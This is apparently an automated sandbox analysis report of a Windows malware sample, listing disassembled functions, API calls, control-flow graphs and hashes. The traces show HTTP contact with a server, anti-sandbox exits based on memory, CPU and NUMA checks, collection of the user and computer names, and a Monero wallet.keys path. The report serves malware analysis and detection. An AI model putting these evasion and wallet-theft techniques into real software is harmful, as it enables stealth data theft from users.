                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: 070a3c753432340e154bfc68b50dbefced7a966f08a1eb2c1f96b4548eefa84b
                                  • Instruction ID: 75d489f7308162340692a4329e7bdf87710993ea5c09b901f57f59fc52acb285
                                  • Opcode Fuzzy Hash: 070a3c753432340e154bfc68b50dbefced7a966f08a1eb2c1f96b4548eefa84b
                                  • Instruction Fuzzy Hash: 6A620BB5928300AFC744DFAAED989663BF9F74C203714871AA709C3274D6399841FF5A
                                  Function 00716280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1033 716280-71630b call 72a7a0 call 7147b0 call 72a740 InternetOpenA StrCmpCA 1040 716314-716318 1033->1040 1041 71630d 1033->1041 1042 716509-716525 call 72a7a0 call 72a800 * 2 1040->1042 1043 71631e-716342 InternetConnectA 1040->1043 1041->1040 1061 716528-71652d 1042->1061 1044 716348-71634c 1043->1044 1045 7164ff-716503 InternetCloseHandle 1043->1045 1047 71635a 1044->1047 1048 71634e-716358 1044->1048 1045->1042 1050 716364-716392 HttpOpenRequestA 1047->1050 1048->1050 1053 7164f5-7164f9 InternetCloseHandle 1050->1053 1054 716398-71639c 1050->1054 1053->1045 1056 7163c5-716405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 71639e-7163bf InternetSetOptionA 1054->1057 1059 716407-716427 call 72a740 call 72a800 * 2 1056->1059 1060 71642c-71644b call 728940 1056->1060 1057->1056 1059->1061 1066 7164c9-7164e9 call 72a740 call 72a800 * 2 1060->1066 1067 71644d-716454 1060->1067 1066->1061 1071 7164c7-7164ef InternetCloseHandle 1067->1071 1072 716456-716480 InternetReadFile 1067->1072 1071->1053 1076 716482-716489 1072->1076 1077 71648b 1072->1077 1076->1077 1080 71648d-7164c5 call 72a9b0 call 72a8a0 call 72a800 1076->1080 1077->1071 1080->1072
                                  APIs
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 007147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00714839
                                    • Part of subcall function 007147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00714849
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  • InternetOpenA.WININET(00730DFE,00000001,00000000,00000000,00000000), ref: 007162E1
                                  • StrCmpCA.SHLWAPI(?,0122F5C8), ref: 00716303
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00716335
                                  • HttpOpenRequestA.WININET(00000000,GET,?,0122E9C8,00000000,00000000,00400100,00000000), ref: 00716385
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007163BF
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007163D1
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007163FD
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0071646D
                                  • InternetCloseHandle.WININET(00000000), ref: 007164EF
                                  • InternetCloseHandle.WININET(00000000), ref: 007164F9
                                  • InternetCloseHandle.WININET(00000000), ref: 00716503
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: 2e2c060a4101ec7e0b8d3dadfebfa59bb88b961654829f71a3db6b7c84f15a87
                                  • Instruction ID: 3b6aeb15c9c548ab2976c11a88ce2f31e5d331f218c3cb237ed8db14aa36f4d6
                                  • Opcode Fuzzy Hash: 2e2c060a4101ec7e0b8d3dadfebfa59bb88b961654829f71a3db6b7c84f15a87
                                  • Instruction Fuzzy Hash: AA715B71A10318EBDB24DBA4DC59BEE77B8FB44701F108198F50A6B1D0DBB86A85CF51
                                  Function 00725510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1090 725510-725577 call 725ad0 call 72a820 * 3 call 72a740 * 4 1106 72557c-725583 1090->1106 1107 7255d7-72564c call 72a740 * 2 call 711590 call 7252c0 call 72a8a0 call 72a800 call 72aad0 StrCmpCA 1106->1107 1108 725585-7255b6 call 72a820 call 72a7a0 call 711590 call 7251f0 1106->1108 1134 725693-7256a9 call 72aad0 StrCmpCA 1107->1134 1138 72564e-72568e call 72a7a0 call 711590 call 7251f0 call 72a8a0 call 72a800 1107->1138 1124 7255bb-7255d2 call 72a8a0 call 72a800 1108->1124 1124->1134 1139 7256af-7256b6 1134->1139 1140 7257dc-725844 call 72a8a0 call 72a820 * 2 call 711670 call 72a800 * 4 call 726560 call 711550 1134->1140 1138->1134 1143 7257da-72585f call 72aad0 StrCmpCA 1139->1143 1144 7256bc-7256c3 1139->1144 1270 725ac3-725ac6 1140->1270 1163 725991-7259f9 call 72a8a0 call 72a820 * 2 call 711670 call 72a800 * 4 call 726560 call 711550 1143->1163 1164 725865-72586c 1143->1164 1148 7256c5-725719 call 72a820 call 72a7a0 call 711590 call 7251f0 call 72a8a0 call 72a800 1144->1148 1149 72571e-725793 call 72a740 * 2 call 711590 call 7252c0 call 72a8a0 call 72a800 call 72aad0 StrCmpCA 1144->1149 1148->1143 1149->1143 1249 725795-7257d5 call 72a7a0 call 711590 call 7251f0 call 72a8a0 call 72a800 1149->1249 1163->1270 1170 725872-725879 1164->1170 1171 72598f-725a14 call 72aad0 StrCmpCA 1164->1171 1179 7258d3-725948 call 72a740 * 2 call 711590 call 7252c0 call 72a8a0 call 72a800 call 72aad0 StrCmpCA 1170->1179 1180 72587b-7258ce call 72a820 call 72a7a0 call 711590 call 7251f0 call 72a8a0 call 72a800 1170->1180 1200 725a16-725a21 Sleep 1171->1200 1201 725a28-725a91 call 72a8a0 call 72a820 * 2 call 711670 call 72a800 * 4 call 726560 call 711550 1171->1201 1179->1171 1275 72594a-72598a call 72a7a0 call 711590 call 7251f0 call 72a8a0 call 72a800 1179->1275 1180->1171 1200->1106 1201->1270 1249->1143 1275->1171
                                  APIs
                                    • Part of subcall function 0072A820: lstrlen.KERNEL32(00714F05,?,?,00714F05,00730DDE), ref: 0072A82B
                                    • Part of subcall function 0072A820: lstrcpy.KERNEL32(00730DDE,00000000), ref: 0072A885
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00725644
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007256A1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00725857
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 007251F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00725228
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 007252C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00725318
                                    • Part of subcall function 007252C0: lstrlen.KERNEL32(00000000), ref: 0072532F
                                    • Part of subcall function 007252C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00725364
                                    • Part of subcall function 007252C0: lstrlen.KERNEL32(00000000), ref: 00725383
                                    • Part of subcall function 007252C0: lstrlen.KERNEL32(00000000), ref: 007253AE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0072578B
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00725940
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00725A0C
                                  • Sleep.KERNEL32(0000EA60), ref: 00725A1B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: f5d5d5cda3366e57d44659912d8b0aa989319d6c44a8c86c5d732f9931c3b16a
                                  • Instruction ID: c55dd50daadd6367e0b18bdd51f50438240c610581e93b1b788750c3cb701db7
                                  • Opcode Fuzzy Hash: f5d5d5cda3366e57d44659912d8b0aa989319d6c44a8c86c5d732f9931c3b16a
                                  • Instruction Fuzzy Hash: FBE12071910218EBDB15FBA0FC5AEED7379AF54300F508128F50666192EF3C6B49CB96
                                  Function 007217A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1301 7217a0-7217cd call 72aad0 StrCmpCA 1304 7217d7-7217f1 call 72aad0 1301->1304 1305 7217cf-7217d1 ExitProcess 1301->1305 1309 7217f4-7217f8 1304->1309 1310 7219c2-7219cd call 72a800 1309->1310 1311 7217fe-721811 1309->1311 1313 721817-72181a 1311->1313 1314 72199e-7219bd 1311->1314 1316 721932-721943 StrCmpCA 1313->1316 1317 721913-721924 StrCmpCA 1313->1317 1318 721970-721981 StrCmpCA 1313->1318 1319 7218f1-721902 StrCmpCA 1313->1319 1320 721951-721962 StrCmpCA 1313->1320 1321 721835-721844 call 72a820 1313->1321 1322 72187f-721890 StrCmpCA 1313->1322 1323 72185d-72186e StrCmpCA 1313->1323 1324 721821-721830 call 72a820 1313->1324 1325 721849-721858 call 72a820 1313->1325 1326 7218cf-7218e0 StrCmpCA 1313->1326 1327 72198f-721999 call 72a820 1313->1327 1328 7218ad-7218be StrCmpCA 1313->1328 1314->1309 1343 721945-721948 1316->1343 1344 72194f 1316->1344 1341 721930 1317->1341 1342 721926-721929 1317->1342 1348 721983-721986 1318->1348 1349 72198d 1318->1349 1339 721904-721907 1319->1339 1340 72190e 1319->1340 1345 721964-721967 1320->1345 1346 72196e 1320->1346 1321->1314 1333 721892-72189c 1322->1333 1334 72189e-7218a1 1322->1334 1331 721870-721873 1323->1331 1332 72187a 1323->1332 1324->1314 1325->1314 1337 7218e2-7218e5 1326->1337 1338 7218ec 1326->1338 1327->1314 1335 7218c0-7218c3 1328->1335 1336 7218ca 1328->1336 1331->1332 1332->1314 1353 7218a8 1333->1353 1334->1353 1335->1336 1336->1314 1337->1338 1338->1314 1339->1340 1340->1314 1341->1314 1342->1341 1343->1344 1344->1314 1345->1346 1346->1314 1348->1349 1349->1314 1353->1314
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 007217C5
                                  • ExitProcess.KERNEL32 ref: 007217D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 690a527c2eaa6bc96a784f336cf0db660da64b82f0ea0e0cc7da1a0952343847
                                  • Instruction ID: 96677dc509c1ca86e452a3af41762d3bb304471aa8efbf1fae2843e37f06275a
                                  • Opcode Fuzzy Hash: 690a527c2eaa6bc96a784f336cf0db660da64b82f0ea0e0cc7da1a0952343847
                                  • Instruction Fuzzy Hash: 0951BFB4B14209EFDB04DFA1E964BBE77F9BF54304F208048E542A7240D778EA81DB62
                                  Function 00727500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1356 727500-72754a GetWindowsDirectoryA 1357 727553-7275c7 GetVolumeInformationA call 728d00 * 3 1356->1357 1358 72754c 1356->1358 1365 7275d8-7275df 1357->1365 1358->1357 1366 7275e1-7275fa call 728d00 1365->1366 1367 7275fc-727617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 727628-727658 wsprintfA call 72a740 1367->1369 1370 727619-727626 call 72a740 1367->1370 1377 72767e-72768e 1369->1377 1370->1377
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00727542
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0072757F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00727603
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0072760A
                                  • wsprintfA.USER32 ref: 00727640
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\$s
                                  • API String ID: 1544550907-1529785113
                                  • Opcode ID: 8b147de7670e00a4e97401451aa9d2b29c8c6d8f702182ed1f005cb801541f22
                                  • Instruction ID: c6bb6bcf5e682df75d3eab7e261451910f1ad846060f03a1d4f401d61934ad3a
                                  • Opcode Fuzzy Hash: 8b147de7670e00a4e97401451aa9d2b29c8c6d8f702182ed1f005cb801541f22
                                  • Instruction Fuzzy Hash: F64183B1D05358EBDB14DF94DD45BDEBBB8EF08700F100199F60967280D7796A44CBA6
                                  Function 007269F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01222FF0), ref: 007298A1
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01222F00), ref: 007298BA
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01222ED0), ref: 007298D2
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01222DB0), ref: 007298EA
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01222E70), ref: 00729903
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01229B90), ref: 0072991B
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01217580), ref: 00729933
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,012174C0), ref: 0072994C
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01222E28), ref: 00729964
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01222D50), ref: 0072997C
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01222D68), ref: 00729995
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01222E88), ref: 007299AD
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01217660), ref: 007299C5
                                    • Part of subcall function 00729860: GetProcAddress.KERNEL32(74DD0000,01222EB8), ref: 007299DE
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 007111D0: ExitProcess.KERNEL32 ref: 00711211
                                    • Part of subcall function 00711160: GetSystemInfo.KERNEL32(?), ref: 0071116A
                                    • Part of subcall function 00711160: ExitProcess.KERNEL32 ref: 0071117E
                                    • Part of subcall function 00711110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0071112B
                                    • Part of subcall function 00711110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00711132
                                    • Part of subcall function 00711110: ExitProcess.KERNEL32 ref: 00711143
                                    • Part of subcall function 00711220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0071123E
                                    • Part of subcall function 00711220: __aulldiv.LIBCMT ref: 00711258
                                    • Part of subcall function 00711220: __aulldiv.LIBCMT ref: 00711266
                                    • Part of subcall function 00711220: ExitProcess.KERNEL32 ref: 00711294
                                    • Part of subcall function 00726770: GetUserDefaultLangID.KERNEL32 ref: 00726774
                                    • Part of subcall function 00711190: ExitProcess.KERNEL32 ref: 007111C6
                                    • Part of subcall function 00727850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007111B7), ref: 00727880
                                    • Part of subcall function 00727850: RtlAllocateHeap.NTDLL(00000000), ref: 00727887
                                    • Part of subcall function 00727850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0072789F
                                    • Part of subcall function 007278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00727910
                                    • Part of subcall function 007278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00727917
                                    • Part of subcall function 007278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0072792F
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01229B80,?,0073110C,?,00000000,?,00731110,?,00000000,00730AEF), ref: 00726ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00726AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00726AF9
                                  • Sleep.KERNEL32(00001770), ref: 00726B04
                                  • CloseHandle.KERNEL32(?,00000000,?,01229B80,?,0073110C,?,00000000,?,00731110,?,00000000,00730AEF), ref: 00726B1A
                                  • ExitProcess.KERNEL32 ref: 00726B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2525456742-0
                                  • Opcode ID: 5e96b362dc39d87a3db6ca5af62f60fb1745447c706ee2f5afbcea3be8efdbfb
                                  • Instruction ID: d39a4861f0696d21230e5616742347bae7338e8624c16db02afd6bdedc0febe0
                                  • Opcode Fuzzy Hash: 5e96b362dc39d87a3db6ca5af62f60fb1745447c706ee2f5afbcea3be8efdbfb
                                  • Instruction Fuzzy Hash: 1A314B70914228FBDB04FBF1EC5ABEE7778AF04301F504528F202A6182DF786945D7A6
                                  Function 00711220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1436 711220-711247 call 7289b0 GlobalMemoryStatusEx 1439 711273-71127a 1436->1439 1440 711249-711271 call 72da00 * 2 1436->1440 1442 711281-711285 1439->1442 1440->1442 1444 711287 1442->1444 1445 71129a-71129d 1442->1445 1447 711292-711294 ExitProcess 1444->1447 1448 711289-711290 1444->1448 1448->1445 1448->1447
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0071123E
                                  • __aulldiv.LIBCMT ref: 00711258
                                  • __aulldiv.LIBCMT ref: 00711266
                                  • ExitProcess.KERNEL32 ref: 00711294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
